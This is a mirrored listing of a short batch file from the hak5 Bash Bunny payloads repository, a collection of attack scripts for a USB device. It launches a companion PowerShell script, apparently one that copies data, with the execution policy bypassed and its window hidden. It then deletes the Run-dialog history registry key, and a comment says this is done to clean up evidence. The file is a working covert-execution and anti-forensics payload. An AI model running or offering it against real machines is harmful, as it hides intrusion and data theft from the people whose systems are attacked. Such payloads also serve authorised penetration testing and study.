mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
10 lines
354 B
Batchfile
10 lines
354 B
Batchfile
@echo off
|
|
|
|
Rem run powershell script with bypass,nologo, and hidden flag
|
|
Start "" powershell.exe -ExecutionPolicy Bypass -nologo -WindowStyle Hidden -File %~dp0\copyMoveData.ps1
|
|
|
|
REM Delete registry key storing Run dialog history...to clean up evidence
|
|
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
|
|
|
@cls
|
|
@exit |